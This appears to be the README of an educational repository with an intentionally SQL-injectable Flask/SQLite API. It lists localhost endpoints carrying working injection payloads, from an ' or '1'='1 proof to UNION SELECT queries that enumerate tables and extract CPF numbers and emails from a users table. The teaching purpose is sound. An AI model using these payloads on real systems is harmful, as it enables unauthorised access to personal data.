The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).
You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.
You can play with the following endpoints (considering you're running on localhost):
| Endpoint | Description |
|---|---|
| /challenges/111.111.111-11 | Expected usage |
| /challenges/' or '1' = '1 | Vulnerability proof |
| /challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_% | Breaks server |
| /challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_% | Queries all tables and fixes broken server |
| /challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; -- | Use union select to query data from other tables |